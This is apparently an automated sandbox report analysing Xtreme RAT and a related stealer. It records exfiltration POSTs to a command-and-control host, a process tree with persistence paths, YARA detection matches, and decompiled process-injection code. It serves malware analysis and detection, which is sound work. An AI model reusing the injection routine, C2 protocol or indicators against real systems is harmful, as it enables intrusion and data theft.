May 3, 2018 10:12:34.756767988 CEST	10	OUT	POST /old/inc/img/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: fashionstune.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F85E9006 Content-Length: 159 Connection: close
May 3, 2018 10:12:34.756993055 CEST	11	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 14 00 00 00 6c 00 75 00 6b 00 65 00 74 00 61 00 79 00 6c 00 6f 00 72 00 01 00 0c 00 00 00 36 00 38 00 38 00 30 00 39 00 38 00 01 00 10 00 00 00 61 00 64 00 6d 00 69 00 6e 00 2d 00 50 00 43 Data Ascii: (ckav.ruluketaylor688098admin-PC0C7379241760F18F4D05EC3BE
May 3, 2018 10:12:35.184411049 CEST	11	IN	HTTP/1.0 200 OK Content-Type: text/html; charset=UTF-8 Content-Length: 23 Date: Thu, 03 May 2018 08:12:34 GMT Accept-Ranges: bytes Server: LiteSpeed Vary: User-Agent Connection: close Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.1.16	49199	103.48.119.225	80	C:\Users\user\AppData\Local\Temp\358saxio.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2018 10:12:57.480429888 CEST	12	OUT	POST /old/inc/img/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: fashionstune.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F85E9006 Content-Length: 159 Connection: close
May 3, 2018 10:12:57.480568886 CEST	13	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 14 00 00 00 6c 00 75 00 6b 00 65 00 74 00 61 00 79 00 6c 00 6f 00 72 00 01 00 0c 00 00 00 36 00 38 00 38 00 30 00 39 00 38 00 01 00 10 00 00 00 61 00 64 00 6d 00 69 00 6e 00 2d 00 50 00 43 Data Ascii: (ckav.ruluketaylor688098admin-PC0C7379241760F18F4D05EC3BE
May 3, 2018 10:12:57.917524099 CEST	13	IN	HTTP/1.0 200 OK Content-Type: text/html; charset=UTF-8 Content-Length: 23 Date: Thu, 03 May 2018 08:12:57 GMT Accept-Ranges: bytes Server: LiteSpeed Vary: User-Agent Connection: close Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.1.16	49221	103.48.119.225	80	C:\Users\user\AppData\Local\Temp\358saxio.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2018 10:13:19.489872932 CEST	25	OUT	POST /old/inc/img/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: fashionstune.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F85E9006 Content-Length: 159 Connection: close
May 3, 2018 10:13:19.491066933 CEST	25	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 14 00 00 00 6c 00 75 00 6b 00 65 00 74 00 61 00 79 00 6c 00 6f 00 72 00 01 00 0c 00 00 00 36 00 38 00 38 00 30 00 39 00 38 00 01 00 10 00 00 00 61 00 64 00 6d 00 69 00 6e 00 2d 00 50 00 43 Data Ascii: (ckav.ruluketaylor688098admin-PC0C7379241760F18F4D05EC3BE
May 3, 2018 10:13:19.885210037 CEST	26	IN	HTTP/1.0 200 OK Content-Type: text/html; charset=UTF-8 Content-Length: 23 Date: Thu, 03 May 2018 08:13:19 GMT Accept-Ranges: bytes Server: LiteSpeed Vary: User-Agent Connection: close Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: sxz.exe PID: 3596 Parent PID: 2980

General

Start time:	10:11:35
Start date:	03/05/2018
Path:	C:\Users\user\Desktop\sxz.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\sxz.exe'
Imagebase:	0x400000
File size:	2297344 bytes
MD5 hash:	D87BDA9120DE373AB47FE445B99B6298
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low

Chronological Activities

Analysis Process: sxz.exe PID: 3624 Parent PID: 3596

General

Start time:	10:11:41
Start date:	03/05/2018
Path:	C:\Users\user\Desktop\sxz.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\sxz.exe
Imagebase:	0x400000
File size:	2297344 bytes
MD5 hash:	D87BDA9120DE373AB47FE445B99B6298
Has administrator privileges:	true
Programmed in:	Java
Reputation:	low

Chronological Activities

Analysis Process: server.exe PID: 3644 Parent PID: 3624

General

Start time:	10:11:43
Start date:	03/05/2018
Path:	C:\Users\user\AppData\Local\Temp\server.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user~1\AppData\Local\Temp\server.exe'
Imagebase:	0xc80000
File size:	546304 bytes
MD5 hash:	1BD2D8CA67E8FF5FDCCCFEBE2F8ECD35
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: RAT_Xtreme, Description: Detects Xtreme RAT, Source: 00000003.00000000.14905165956.00C81000.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: RAT_Xtreme, Description: Detects Xtreme RAT, Source: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: RAT_Xtreme, Description: Detects Xtreme RAT, Source: 00000003.00000002.14987723130.00C81000.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: RAT_Xtreme, Description: Detects Xtreme RAT, Source: 00000003.00000000.14904035142.00C81000.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: RAT_Xtreme, Description: Detects Xtreme RAT, Source: 00000003.00000000.14905430148.00C81000.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: RAT_Xtreme, Description: Detects Xtreme RAT, Source: 00000003.00000000.14904944731.00C81000.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Chronological Activities

Analysis Process: javaw.exe PID: 3668 Parent PID: 3624

General

Start time:	10:11:44
Start date:	03/05/2018
Path:	C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe' -jar 'C:\Users\user~1\AppData\Local\Temp\uroi.jar'
Imagebase:	0x10c0000
File size:	191400 bytes
MD5 hash:	C731C96456335BDAA2F58220AE25A202
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: svchost.exe PID: 3680 Parent PID: 3644

General

Start time:	10:11:44
Start date:	03/05/2018
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	svchost.exe
Imagebase:	0xee0000
File size:	20992 bytes
MD5 hash:	54A47F6B5E09A77E61649109C6A08866
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Xtreme_Sep17_1, Description: Detects XTREME sample analyzed in September 2017, Source: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Author: Florian Roth Rule: RAT_Xtreme, Description: Detects Xtreme RAT, Source: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Xtreme_Sep17_1, Description: Detects XTREME sample analyzed in September 2017, Source: 00000005.00000002.15177862719.00290000.00000004.sdmp, Author: Florian Roth Rule: RAT_Xtreme, Description: Detects Xtreme RAT, Source: 00000005.00000002.15177862719.00290000.00000004.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Xtreme_Sep17_1, Description: Detects XTREME sample analyzed in September 2017, Source: 00000005.00000000.14909911900.00C80000.00000040.sdmp, Author: Florian Roth Rule: RAT_Xtreme, Description: Detects Xtreme RAT, Source: 00000005.00000000.14909911900.00C80000.00000040.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 3696 Parent PID: 3644

General

Start time:	10:11:46
Start date:	03/05/2018
Path:	C:\Program Files\Internet Explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Internet Explorer\iexplore.exe
Imagebase:	0x8d0000
File size:	815312 bytes
MD5 hash:	EE79D654A04333F566DF07EBDE217928
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Xtreme_Sep17_1, Description: Detects XTREME sample analyzed in September 2017, Source: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Author: Florian Roth Rule: RAT_Xtreme, Description: Detects Xtreme RAT, Source: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Xtreme_Sep17_1, Description: Detects XTREME sample analyzed in September 2017, Source: 00000006.00000000.14913253676.00C80000.00000040.sdmp, Author: Florian Roth Rule: RAT_Xtreme, Description: Detects Xtreme RAT, Source: 00000006.00000000.14913253676.00C80000.00000040.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	moderate

Chronological Activities

Analysis Process: explorer.exe PID: 3740 Parent PID: 2928

General

Start time:	10:11:47
Start date:	03/05/2018
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	explorer.exe C:\Users\user\AppData\Roaming/Microsoft/Skype.exe
Imagebase:	0x1e0000
File size:	2972672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: explorer.exe PID: 3752 Parent PID: 2928

General

Start time:	10:11:48
Start date:	03/05/2018
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	explorer.exe C:\Windows\InstallDir\Server.exe
Imagebase:	0x1e0000
File size:	2972672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: explorer.exe PID: 3804 Parent PID: 536

General

Start time:	10:11:49
Start date:	03/05/2018
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Imagebase:	0x1e0000
File size:	2972672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: java.exe PID: 3832 Parent PID: 3668

General

Start time:	10:11:49
Start date:	03/05/2018
Path:	C:\Program Files\Java\jre1.8.0_40\bin\java.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Java\jre1.8.0_40\bin\java.exe' -jar C:\Users\user~1\AppData\Local\Temp\_0.71076688945376033550400146700531635.class
Imagebase:	0x370000
File size:	190888 bytes
MD5 hash:	6F4EB294ACF731771AFE3EF6F7EE812D
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: explorer.exe PID: 3860 Parent PID: 2928

General

Start time:	10:11:50
Start date:	03/05/2018
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	explorer.exe C:\Windows\InstallDir\Server.exe
Imagebase:	0x1e0000
File size:	2972672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: 358saxio.exe PID: 3884 Parent PID: 3644

General

Start time:	10:11:50
Start date:	03/05/2018
Path:	C:\Users\user\AppData\Local\Temp\358saxio.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user~1\AppData\Local\Temp\358saxio.exe'
Imagebase:	0x400000
File size:	489472 bytes
MD5 hash:	E938586EC1F858C38A74F3993A8678D7
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3916 Parent PID: 536

General

Start time:	10:11:50
Start date:	03/05/2018
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Imagebase:	0x1e0000
File size:	2972672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: explorer.exe PID: 3960 Parent PID: 536

General

Start time:	10:11:51
Start date:	03/05/2018
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Imagebase:	0x1e0000
File size:	2972672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: RAT_Xtreme, Description: Detects Xtreme RAT, Source: 0000000E.00000001.14937243423.01B81000.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: RAT_Xtreme, Description: Detects Xtreme RAT, Source: 0000000E.00000001.14936774837.01B81000.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	high

Chronological Activities

Analysis Process: Server.exe PID: 4032 Parent PID: 3960

General

Start time:	10:11:55
Start date:	03/05/2018
Path:	C:\Windows\InstallDir\Server.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\InstallDir\Server.exe'
Imagebase:	0xc80000
File size:	546304 bytes
MD5 hash:	1BD2D8CA67E8FF5FDCCCFEBE2F8ECD35
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: RAT_Xtreme, Description: Detects Xtreme RAT, Source: 0000000F.00000000.14937698570.00C81000.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: RAT_Xtreme, Description: Detects Xtreme RAT, Source: 0000000F.00000002.14989895202.00C81000.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: RAT_Xtreme, Description: Detects Xtreme RAT, Source: 0000000F.00000000.14932929795.00C81000.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: RAT_Xtreme, Description: Detects Xtreme RAT, Source: 0000000F.00000000.14944848932.00C81000.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: RAT_Xtreme, Description: Detects Xtreme RAT, Source: 0000000F.00000000.14950318636.00C81000.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: RAT_Xtreme, Description: Detects Xtreme RAT, Source: 0000000F.00000001.14957378618.00C81000.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Xtreme_Sep17_1, Description: Detects XTREME sample analyzed in September 2017, Source: C:\Windows\InstallDir\Server.exe, Author: Florian Roth Rule: RAT_Xtreme, Description: Detects Xtreme RAT, Source: C:\Windows\InstallDir\Server.exe, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 2200 Parent PID: 3668

General

Start time:	10:12:00
Start date:	03/05/2018
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /C cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive5899708393590982329.vbs
Imagebase:	0x4a8a0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: 358saxio.exe PID: 2184 Parent PID: 3884

General

Start time:	10:12:01
Start date:	03/05/2018
Path:	C:\Users\user\AppData\Local\Temp\358saxio.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user~1\AppData\Local\Temp\358saxio.exe
Imagebase:	0x400000
File size:	489472 bytes
MD5 hash:	E938586EC1F858C38A74F3993A8678D7
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: cscript.exe PID: 2104 Parent PID: 2200

General

Start time:	10:12:04
Start date:	03/05/2018
Path:	C:\Windows\System32\cscript.exe
Wow64 process (32bit):	false
Commandline:	cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive5899708393590982329.vbs
Imagebase:	0x900000
File size:	126976 bytes
MD5 hash:	A3A35EE79C64A640152B3113E6E254E2
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 2436 Parent PID: 3832

General

Start time:	10:12:05
Start date:	03/05/2018
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /C cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive4502924618821110619.vbs
Imagebase:	0x4a8a0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cscript.exe PID: 2556 Parent PID: 2436

General

Start time:	10:12:08
Start date:	03/05/2018
Path:	C:\Windows\System32\cscript.exe
Wow64 process (32bit):	false
Commandline:	cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive4502924618821110619.vbs
Imagebase:	0x900000
File size:	126976 bytes
MD5 hash:	A3A35EE79C64A640152B3113E6E254E2
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: explorer.exe PID: 2480 Parent PID: 2928

General

Start time:	10:12:10
Start date:	03/05/2018
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	explorer.exe C:\Users\user\AppData\Roaming/Microsoft/Skype.exe
Imagebase:	0x1e0000
File size:	2972672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: explorer.exe PID: 2320 Parent PID: 536

General

Start time:	10:12:11
Start date:	03/05/2018
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Imagebase:	0x1e0000
File size:	2972672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: Server.exe PID: 2116 Parent PID: 3680

General

Start time:	10:12:24
Start date:	03/05/2018
Path:	C:\Windows\InstallDir\Server.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\InstallDir\Server.exe'
Imagebase:	0xc80000
File size:	546304 bytes
MD5 hash:	1BD2D8CA67E8FF5FDCCCFEBE2F8ECD35
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: RAT_Xtreme, Description: Detects Xtreme RAT, Source: 0000001B.00000000.15000788791.00C81000.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: RAT_Xtreme, Description: Detects Xtreme RAT, Source: 0000001B.00000001.15007151931.00C81000.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: RAT_Xtreme, Description: Detects Xtreme RAT, Source: 0000001B.00000000.15001441864.00C81000.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: RAT_Xtreme, Description: Detects Xtreme RAT, Source: 0000001B.00000000.14999659592.00C81000.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: RAT_Xtreme, Description: Detects Xtreme RAT, Source: 0000001B.00000002.15035469105.00C81000.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: RAT_Xtreme, Description: Detects Xtreme RAT, Source: 0000001B.00000000.15004091676.00C81000.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 2148 Parent PID: 3668

General

Start time:	10:12:24
Start date:	03/05/2018
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /C cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive3783187546293847897.vbs
Imagebase:	0x4a8a0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 2060 Parent PID: 3832

General

Start time:	10:12:25
Start date:	03/05/2018
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /C cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive5306090169834682625.vbs
Imagebase:	0x4a8a0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cscript.exe PID: 2452 Parent PID: 2148

General

Start time:	10:12:25
Start date:	03/05/2018
Path:	C:\Windows\System32\cscript.exe
Wow64 process (32bit):	false
Commandline:	cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive3783187546293847897.vbs
Imagebase:	0x520000
File size:	126976 bytes
MD5 hash:	A3A35EE79C64A640152B3113E6E254E2
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cscript.exe PID: 2548 Parent PID: 2060

General

Start time:	10:12:26
Start date:	03/05/2018
Path:	C:\Windows\System32\cscript.exe
Wow64 process (32bit):	false
Commandline:	cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive5306090169834682625.vbs
Imagebase:	0x520000
File size:	126976 bytes
MD5 hash:	A3A35EE79C64A640152B3113E6E254E2
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 236 Parent PID: 2116

General

Start time:	10:12:28
Start date:	03/05/2018
Path:	C:\Program Files\Internet Explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Internet Explorer\iexplore.exe
Imagebase:	0xb00000
File size:	815312 bytes
MD5 hash:	EE79D654A04333F566DF07EBDE217928
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Xtreme_Sep17_1, Description: Detects XTREME sample analyzed in September 2017, Source: 00000022.00000000.15012281235.00C80000.00000040.sdmp, Author: Florian Roth Rule: RAT_Xtreme, Description: Detects Xtreme RAT, Source: 00000022.00000000.15012281235.00C80000.00000040.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Xtreme_Sep17_1, Description: Detects XTREME sample analyzed in September 2017, Source: 00000022.00000002.15021754459.00C80000.00000040.sdmp, Author: Florian Roth Rule: RAT_Xtreme, Description: Detects Xtreme RAT, Source: 00000022.00000002.15021754459.00C80000.00000040.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	moderate

Chronological Activities

Analysis Process: 358saxio.exe PID: 1832 Parent PID: 2116

General

Start time:	10:12:30
Start date:	03/05/2018
Path:	C:\Users\user\AppData\Local\Temp\358saxio.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user~1\AppData\Local\Temp\358saxio.exe'
Imagebase:	0x400000
File size:	489472 bytes
MD5 hash:	E938586EC1F858C38A74F3993A8678D7
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low

Chronological Activities

Analysis Process: xcopy.exe PID: 2240 Parent PID: 3668

General

Start time:	10:12:34
Start date:	03/05/2018
Path:	C:\Windows\System32\xcopy.exe
Wow64 process (32bit):	false
Commandline:	xcopy 'C:\Program Files\Java\jre1.8.0_40' 'C:\Users\user\AppData\Roaming\Oracle\' /e
Imagebase:	0xf90000
File size:	36864 bytes
MD5 hash:	361D273773994ED11A6F1E51BBB4277E
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: server.exe PID: 3644 Parent PID: 3624

Execution Graph

Execution Coverage:	7.3%
Dynamic/Decrypted Code Coverage:	99.9%
Signature Coverage:	6.6%
Total number of Nodes:	996
Total number of Limit Nodes:	21

Executed Functions

Function 00C83CE4, Relevance: 10.6, APIs: 7, Instructions: 70
injectionthread

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E00C83CE4(void* __eax, void* __ecx, _Unknown_base(*)()* __edx) {
				long _v20;
				long _v24;
				intOrPtr _v28;
				void* _v32;
				_Unknown_base(*)()* _v36;
				void* _t18;
				void* _t20;
				void* _t30;
				struct HINSTANCE__* _t32;
				void* _t35;
				long _t36;
				void* _t37;

				_v32 = __ecx;
				_v36 = __edx;
				_t30 = __eax;
				_v28 = 0;
				_t32 = GetModuleHandleA(0);
				_push(0);
				_push(_t32);
				asm("cdq");
				_t18 =  *((intOrPtr*)(_t32 + 0x3c)) + _v20;
				asm("adc edx, [esp+0x4]");
				_t36 =  *(_t18 + 0x50);
				_t35 =  *(_t18 + 0x34);
				VirtualFreeEx(_t30, _t35, 0, 0x8000); // executed
				_t20 = VirtualAllocEx(_t30, _t35, _t36, 0x3000, 0x40); // executed
				_t37 = _t20;
				if(_t37 != 0) {
					WriteProcessMemory(_t30, _t35, GetModuleHandleA(0), _t36,  &_v24);
					if(_t36 <= _v24) {
						CreateRemoteThread(_t30, 0, 0, _v36, _v32, 0,  &_v20);
						CloseHandle(_t30);
						_v32 = _t37;
					}
				}
				return _v28;
			}

0x00c83ceb
0x00c83cef
0x00c83cf2
0x00c83cf6
0x00c83d01
0x00c83d07
0x00c83d08
0x00c83d0c
0x00c83d0d
0x00c83d10
0x00c83d17
0x00c83d1a
0x00c83d26
0x00c83d35
0x00c83d3a
0x00c83d3e
0x00c83d50
0x00c83d59
0x00c83d71
0x00c83d77
0x00c83d7c
0x00c83d7c
0x00c83d59
0x00c83d8b

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00C83CFC
VirtualFreeEx.KERNEL32(0000017C,?,00000000,00008000), ref: 00C83D26
VirtualAllocEx.KERNEL32(0000017C,?,?,00003000,00000040,0000017C,?,00000000,00008000), ref: 00C83D35
GetModuleHandleA.KERNEL32(00000000,?,?,0000017C,?,?,00003000,00000040,0000017C,?,00000000,00008000), ref: 00C83D48
WriteProcessMemory.KERNEL32(0000017C,?,00000000,00000000,?,?,0000017C,?,?,00003000,00000040,0000017C,?,00000000,00008000), ref: 00C83D50
CreateRemoteThread.KERNEL32(0000017C,00000000,00000000,?,?,00000000,?), ref: 00C83D71
CloseHandle.KERNEL32(0000017C), ref: 00C83D77

Memory Dump Source

Source File: 00000003.00000002.14987723130.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000002.14987701888.00C80000.00000002.sdmp
Associated: 00000003.00000002.14987831627.00C8B000.00000004.sdmp
Associated: 00000003.00000002.14987969368.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_server.jbxd

Yara matches

Function 00C835B0, Relevance: 3.0, APIs: 2, Instructions: 16

C-Code - Quality: 100%

			E00C835B0(WCHAR* __eax) {
				void* _t2;
				void* _t5;
				struct _WIN32_FIND_DATAW* _t6;

				_t2 = FindFirstFileW(__eax, _t6); // executed
				if(_t2 != 0xffffffff) {
					_t5 = 1;
				} else {
					_t5 = 0;
				}
				CloseHandle(_t2);
				return _t5;
			}

0x00c835b9
0x00c835c1
0x00c835c7
0x00c835c3
0x00c835c3
0x00c835c3
0x00c835ca
0x00c835d8

APIs

FindFirstFileW.KERNEL32(00000000), ref: 00C835B9
CloseHandle.KERNEL32(00000000), ref: 00C835CA

Memory Dump Source

Source File: 00000003.00000002.14987723130.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000002.14987701888.00C80000.00000002.sdmp
Associated: 00000003.00000002.14987831627.00C8B000.00000004.sdmp
Associated: 00000003.00000002.14987969368.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_server.jbxd

Yara matches

Function 00C89BA4, Relevance: 114.4, APIs: 37, Strings: 28, Instructions: 676
sleep

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			_entry_(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				char _v24;
				char _v6196;
				char _v6200;
				char _v6204;
				char _v6208;
				char _v6212;
				char _v6216;
				char* _t37;
				void* _t45;
				long _t46;
				void* _t59;
				void* _t67;
				void* _t72;
				void* _t74;
				void* _t80;
				void* _t96;
				short* _t101;
				short* _t107;
				short* _t117;
				intOrPtr _t133;
				intOrPtr _t138;
				intOrPtr* _t139;
				intOrPtr _t141;
				intOrPtr* _t142;
				void* _t145;
				void* _t147;
				void* _t149;
				long _t150;
				short* _t159;
				int* _t161;
				void* _t163;
				int* _t166;
				void* _t168;
				intOrPtr _t170;
				int* _t172;
				void* _t174;
				intOrPtr _t176;
				void* _t178;
				intOrPtr* _t185;
				void* _t197;
				intOrPtr* _t199;
				intOrPtr _t221;
				void* _t222;
				void* _t223;
				intOrPtr _t225;
				intOrPtr _t228;
				intOrPtr _t232;
				WCHAR* _t235;
				intOrPtr _t243;
				void* _t249;
				WCHAR* _t251;
				short* _t253;
				void* _t274;
				short* _t275;
				short* _t297;
				void* _t298;
				short* _t301;
				short* _t303;
				void* _t306;
				void* _t314;
				WCHAR* _t340;
				signed int _t343;
				void* _t378;
				void* _t381;
				intOrPtr _t391;
				void* _t401;
				short* _t411;
